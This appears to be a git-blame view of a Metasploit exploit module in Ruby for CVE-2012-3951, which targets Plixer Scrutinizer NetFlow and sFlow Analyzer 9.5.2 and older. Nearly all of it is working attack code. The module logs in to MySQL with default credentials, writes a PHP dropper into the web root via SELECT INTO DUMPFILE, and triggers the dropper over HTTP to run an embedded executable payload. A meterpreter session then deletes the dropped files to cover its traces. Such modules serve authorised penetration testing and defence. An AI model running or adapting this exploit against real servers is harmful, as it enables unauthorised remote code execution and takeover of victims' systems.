2012-08-07 08:19:44 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-08-07 08:19:44 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::MYSQL
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",
|
|
|
|
'Description' => %q{
|
|
|
|
This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.
|
|
|
|
By default, the software installs a default password in MySQL, and binds the
|
|
|
|
service to "0.0.0.0". This allows any remote user to login to MySQL, and then
|
|
|
|
gain arbitrary remote code execution under the context of 'SYSTEM'. Examples
|
|
|
|
of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'MC',
|
|
|
|
'Jonathan Claudius',
|
|
|
|
'Tanya Secker',
|
|
|
|
'sinn3r'
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2012-3951'],
|
2016-07-15 17:00:31 +00:00
|
|
|
['OSVDB', '84317'],
|
2013-08-30 21:28:54 +00:00
|
|
|
['URL', 'http://secunia.com/advisories/50074/'],
|
|
|
|
['URL', 'https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt']
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'BadChars' => "\x00"
|
|
|
|
},
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
2017-02-23 23:04:36 +00:00
|
|
|
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
2013-08-30 21:28:54 +00:00
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
['Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older', {}]
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => "Jul 27 2012",
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new("USERNAME", [true, 'The default MySQL username', 'scrutremote']),
|
|
|
|
OptString.new("PASSWORD", [true, 'The default MySQL password', 'admin']),
|
|
|
|
OptPort.new("MYSQLPORT", [true, 'The MySQL\'s remote port', 3306]),
|
|
|
|
OptPort.new("HTTPPORT", [true, 'The HTTP Server\'s remote port', 80]),
|
|
|
|
OptString.new("TARGETURI", [true, 'The web application\'s base path', '/'])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
# Both MySQL and HTTP need to use this, we'll have to register on the fly.
|
|
|
|
deregister_options('RPORT')
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def check
|
|
|
|
tmp_rport = datastore['RPORT']
|
|
|
|
datastore['RPORT'] = datastore['HTTPPORT']
|
|
|
|
res = send_request_raw({'uri'=>'/'}) #Check the base path for regex
|
|
|
|
datastore['RPORT'] = tmp_rport
|
|
|
|
if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
|
|
|
|
res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/
|
2014-01-20 20:26:10 +00:00
|
|
|
return Exploit::CheckCode::Appears
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def get_php_payload(fname)
|
|
|
|
p = Rex::Text.encode_base64(generate_payload_exe)
|
|
|
|
php = %Q|
|
|
|
|
<?php
|
|
|
|
$f = fopen("#{fname}", "wb");
|
|
|
|
fwrite($f, base64_decode("#{p}"));
|
|
|
|
fclose($f);
|
|
|
|
exec("#{fname}");
|
|
|
|
?>
|
|
|
|
|
|
2013-12-31 17:06:53 +00:00
|
|
|
php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')
|
2013-08-30 21:28:54 +00:00
|
|
|
return php
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# I wanna be able to choose my own destination... path!
|
|
|
|
#
|
|
|
|
def mysql_upload_binary(bindata, path)
|
|
|
|
# Modify the rport so we can use MySQL
|
|
|
|
datastore['RPORT'] = datastore['MYSQLPORT']
|
|
|
|
|
|
|
|
# Login
|
|
|
|
h = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
|
|
|
|
return false if not h
|
|
|
|
|
|
|
|
tmp = mysql_get_temp_dir
|
|
|
|
p = bindata.unpack("H*")[0]
|
|
|
|
dest = tmp + path
|
|
|
|
mysql_query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def exe_php(php_fname)
|
|
|
|
# Modify the rport so we can use HTTP
|
|
|
|
datastore['RPORT'] = datastore['HTTPPORT']
|
|
|
|
|
|
|
|
# Request our payload
|
|
|
|
uri = normalize_uri(target_uri.path)
|
|
|
|
path = File.dirname("#{uri}/.")
|
|
|
|
res = send_request_raw({'uri'=>"#{path}#{php_fname}"})
|
|
|
|
return (res and res.code == 200)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def cleanup
|
|
|
|
datastore['RPORT'] = @original_rport
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def on_new_session(cli)
|
|
|
|
if cli.type != 'meterpreter'
|
|
|
|
print_error("Please remember to manually remove #{@exe_fname} and #{@php_fname}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
|
|
|
|
|
|
|
|
begin
|
|
|
|
print_warning("Deleting #{@php_fname}")
|
|
|
|
cli.fs.file.rm(@php_fname)
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_error("Please note: #{@php_fname} is stil on disk.")
|
|
|
|
end
|
|
|
|
|
|
|
|
begin
|
|
|
|
print_warning("Deleting #{@exe_fname}")
|
|
|
|
cli.fs.file.rm(@exe_fname)
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_error("Please note: #{@exe_fname} is still on disk.")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
@original_rport = datastore['RPORT']
|
|
|
|
|
|
|
|
#
|
|
|
|
# Prepare our payload (naughty exe embedded in php)
|
|
|
|
#
|
|
|
|
@exe_fname = Rex::Text.rand_text_alpha(6) + '.exe'
|
|
|
|
p = get_php_payload(@exe_fname)
|
|
|
|
|
|
|
|
#
|
|
|
|
# Upload our payload to the html directory
|
|
|
|
#
|
|
|
|
print_status("Uploading #{p.length.to_s} bytes via MySQL...")
|
|
|
|
@php_fname = Rex::Text.rand_text_alpha(5) + '.php'
|
|
|
|
if not mysql_upload_binary(p, "../../html/#{@php_fname}")
|
|
|
|
print_error("That MySQL upload didn't work.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Execute the payload
|
|
|
|
#
|
|
|
|
print_status("Requesting #{@php_fname}...")
|
|
|
|
res = exe_php(@php_fname)
|
|
|
|
|
|
|
|
handler
|
|
|
|
end
|
2012-08-07 08:19:44 +00:00
|
|
|
end
|